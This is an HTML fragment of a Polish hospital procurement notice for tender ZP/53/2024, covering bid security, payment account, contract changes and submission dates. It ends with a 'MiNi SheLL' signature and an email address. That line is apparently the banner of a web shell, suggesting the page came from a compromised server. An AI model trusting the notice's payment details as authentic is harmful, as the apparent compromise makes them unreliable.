class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium w kwocie 30 000,00 PLN (słownie: trzydzieści tysięcy złotych).<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>2.1 pieniądzu;<br/>2.2 gwarancjach bankowych;<br/>2.3 gwarancjach ubezpieczeniowych;<br/>2.4 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. Jeżeli wadium jest wnoszone w jednej z form wymienionych w pkt 2.2-2.4 wykonawca musi załączyć do oferty oryginał gwarancji lub poręczenia w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu. <br/>Zamawiający nie dopuszcza złożenia tego dokumentu w jakiejkolwiek innej formie, np. pisemnej albo cyfrowego odwzorowania dokumentu opatrzonego kwalifikowanym podpisem elektronicznym. Beneficjentem takich dokumentów musi być Szpital Specjalistyczny w Jaśle, ul. Lwowska 22, 38-200 Jasło.<br/>4. W przypadku wnoszenia wadium w pieniądzu kwotę należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony przez Bank PKO Bank Polski S.A. Nr: 19 1020 4391 0000 6102 0198 8450 W tytule przelewu należy wpisać: „wadium w sprawie postępowania nr: ZP/53/2024”.<br/>5. Wadium wnoszone w pieniądzu jest wniesione skutecznie, jeżeli zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>6. Dowód wniesienia wadium w pieniądzu Zamawiający zaleca załączyć do oferty.<br/>7. Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 98 ust. 6 pkt 1, 2 ppkt a) i 3 ustawy Pzp / Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 98 ust. 6 pkt 1, 2 i 3 ustawy Pzp.<br/>8. Zwrot bądź zatrzymanie wadium nastąpi zgodnie z art. 98 ustawy Pzp. <br/>9. Niespełnienie przez Wykonawcę wymogów, o których mowa w pkt 2 – 7 skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z pkt 6 Dział XI SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami Zał. Nr 4 do SWZ- projekt umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szpitaljaslo.eb2b.com.pl/open-auctions.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-02 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia wynosi 8 miesięcy od dnia podpisania umowy, w podziale na dwa etapy, tj. Etap I do 4 miesięcy od dnia przekazania terenu budowy, Etap II do 4 miesięcy bezpośrednio po zakończeniu I etapu.<br/><br/><br/>Zadanie inwestycyjne dofinansowane - dotacja celowa z Funduszu Medycznego<br/>w ramach Subfunduszu modernizacji podmiotów leczniczych.<br/>Umowa dofinansowania nr DOI/FM/SMPL/59/MDSOR/2023/241/313 z dnia 23.11.2023 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com